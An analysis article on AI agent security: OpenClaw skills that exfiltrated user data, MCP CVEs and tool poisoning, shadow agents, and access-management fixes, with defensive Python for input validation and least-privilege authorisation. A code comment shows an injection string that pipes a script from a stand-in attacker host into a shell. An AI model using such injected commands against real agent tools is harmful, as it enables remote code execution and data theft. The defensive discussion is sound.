Every week brings new breakthroughs in AI agents. Every week also brings evidence that the infrastructure underneath them was not built for what is being asked of it.
The numbers are not subtle. According to Okta research cited by Auth0 president Shiv Ramji in a Computer Weekly column published Monday, 91% of organisations are now adopting AI agents. Just 10% have governance strategies in place. That gap, between deployment velocity and the security infrastructure to contain what has been deployed, is the actual story in enterprise AI security right now.
The concrete version of that gap showed up in February 2026, when critical vulnerabilities were discovered across the OpenClaw skill marketplace. More than 5,700 community-built skills were available in the marketplace at the time. Over 21,000 exposed instances were identified. Malicious actors had uploaded skills that performed legitimate automation tasks while secretly exfiltrating sensitive data from users' machines. The agent that was supposed to help you was helping itself to your files.
OpenClaw is not a fringe project. It is the fastest-growing open-source project in GitHub history, with over 188,000 stars. When a marketplace that size — with that many contributors, that many installed instances, and that broad a reach into developer workflows — becomes the entry point for a data exfiltration campaign, it is not an anomaly. It is a preview.
The Model Context Protocol, the Anthropic-developed standard for connecting AI models to external tools and services, tells the same story from a different angle. Adversa AI documented 30 CVEs filed against MCP implementations in a 60-day window earlier this year. A February 2026 audit found that 43% of publicly available MCP servers were vulnerable to command execution attacks — inadequate input validation, missing authentication, overly permissive tool definitions. Researchers demonstrated tool poisoning attacks against the WhatsApp MCP Server. Anthropic's own Git MCP server had confirmed remote code execution vulnerabilities.
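To make the "inadequate input validation" finding concrete, here is a minimal sketch of the fix for the command execution class the audit describes. It is illustrative only: the tool name, allowlist, and function names are assumptions, not code from any audited server.

```python
import shlex

# Hypothetical MCP-style "git" tool handler. A vulnerable server would
# interpolate the raw argument string into a shell command, letting input
# like "status; curl attacker.example | sh" execute arbitrary commands.
ALLOWED_SUBCOMMANDS = {"status", "log", "diff"}  # explicit allowlist

def validate_git_args(raw: str) -> list[str]:
    """Validate user-supplied tool input before any execution."""
    tokens = shlex.split(raw)
    if not tokens or tokens[0] not in ALLOWED_SUBCOMMANDS:
        raise ValueError(f"subcommand not permitted: {raw!r}")
    if any(t.startswith("-") for t in tokens[1:]):
        # Flags can smuggle behaviour too, e.g. git's --upload-pack.
        raise ValueError("flags are not permitted")
    # Return an argv list for subprocess.run(argv) with shell=False,
    # so shell metacharacters in arguments are inert.
    return ["git", *tokens]
```

The two design choices doing the work are the explicit allowlist (deny by default) and executing an argv list without a shell, so that semicolons, pipes, and backticks in model- or user-controlled input are treated as data, not syntax.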
Thirty CVEs in 60 days. That is not a development problem. That is a deployment velocity problem. The protocol shipped with security as an afterthought, and the field is now racing to catch up.
Ramji frames it correctly as an architectural shift, not a feature gap. Traditional applications operate within predictable boundaries — users navigate defined screens, execute defined transactions, move through guarded corridors inside application logic. AI agents are conversational, accept natural language input from anywhere, and make autonomous decisions that cannot be entirely predicted. The access point is no longer buried in application code. It is at the front end, in the conversation itself. When you compromise a deterministic application, damage is contained. When you compromise an AI agent, you are looking at potential access across your entire infrastructure, with actions that ripple in unpredictable directions.
The four requirements Ramji lays out — genuine agent and user authentication linking each agent action back to its authorising human; standardised secure API access hardened against token leakage; human validation in the loop for high-risk actions; and fine-grained least-privilege permissions with full audit logging — are not radical ideas. They are the access management playbook that organisations have spent two decades learning for human users, applied to non-human identities. The problem is that most organisations have not started that translation yet.
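Translated into code, that playbook is not exotic. The sketch below, with hypothetical agent names and scopes, shows the shape of an authorisation gate that covers three of the four requirements: per-agent least-privilege permissions, a mandatory human-approval pause for high-risk actions, and an audit record linking each agent action back to its authorising user.

```python
import logging
from dataclasses import dataclass

logging.basicConfig(level=logging.INFO)
audit = logging.getLogger("agent.audit")

# Hypothetical policy tables; agent IDs and scope names are illustrative.
PERMISSIONS = {
    "report-agent": {"crm:read"},                      # read-only by default
    "billing-agent": {"crm:read", "billing:refund"},
}
HIGH_RISK = {"billing:refund"}  # actions requiring a human in the loop

@dataclass
class AgentAction:
    agent_id: str
    on_behalf_of: str  # the authorising human behind this agent action
    scope: str

def authorise(action: AgentAction, human_approved: bool = False) -> bool:
    """Least-privilege check plus human validation for high-risk scopes."""
    allowed = action.scope in PERMISSIONS.get(action.agent_id, set())
    if allowed and action.scope in HIGH_RISK and not human_approved:
        allowed = False  # pause until a human explicitly approves
    # Every decision is logged with the agent-to-human link intact.
    audit.info("agent=%s user=%s scope=%s allowed=%s",
               action.agent_id, action.on_behalf_of, action.scope, allowed)
    return allowed
```

Nothing here is novel; it is ordinary access management with the subject changed from a human session to a non-human identity, which is exactly Ramji's point.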
The MCP ecosystem is trying to embed security earlier in the design cycle than cloud and APIs did. But effort is not outcome. The CVE count and the OpenClaw incident suggest the outcome so far is a protocol and a marketplace that grew faster than their security surface was hardened.
Shadow agents make this worse. These are the autonomous workflows employees build outside IT purview — connecting ChatGPT to company email via Zapier, running OpenClaw on a personal laptop with access to Slack channels and Jira, pulling production data through n8n for processing by Claude. None of these are malicious by intent. All of them create unmanaged, unmonitored agents with access to sensitive company data, operating with the full permissions of the creating user and often more, since many platforms request broad OAuth scopes.
The gap between 91% adoption and 10% governance is not abstract. It is 21,000 exposed OpenClaw instances. It is 30 MCP CVEs in 60 days. It is a shadow agent ecosystem that most IT teams cannot see, let alone secure. The foundational principles — identity governance, least-privilege access, encryption, comprehensive auditing — still work. They are more important than ever. The question is whether organisations approach this thoughtfully or spend the next several years managing preventable incidents. The evidence so far suggests the clock is not on their side.